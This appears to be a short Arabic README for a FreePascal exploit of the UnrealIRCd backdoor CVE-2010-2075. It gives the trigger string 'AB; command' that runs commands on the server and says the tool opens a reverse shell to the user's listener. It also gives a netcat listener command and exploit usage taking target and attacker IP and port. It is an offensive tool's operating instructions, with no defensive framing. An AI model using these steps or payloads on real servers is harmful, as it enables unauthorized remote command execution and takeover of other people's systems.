
تنفيذ FreePascal لثغرة UnrealIRCD CVE-2010-2075
تنفيذ FreePascal لـ CVE-2010-2075
ثغرة تنفيذ برمجي عن بُعد (RCE) عن طريق إرسال "AB; command" إلى أي خدمة تستمع. أي أمر ترسله يتم تنفيذه بنفس المستخدم الذي يعمل به UnrealIRCD.
هذا التنفيذ يقوم بتشغيل قشرة عكسية إلى المستمع الخاص بك.
ابدأ مستمعًا، مثال: netcat -lvp 4444
نفّذ الاستغلال ./exploit <target ip> <target port> <host ip> <host port> حيث أن عنوان IP ومنفذ المضيف هما المكان الذي يعمل فيه المستمع الخاص بك.
Synapse. إذا لم يكن لديك، قم بتثبيته عبر OPM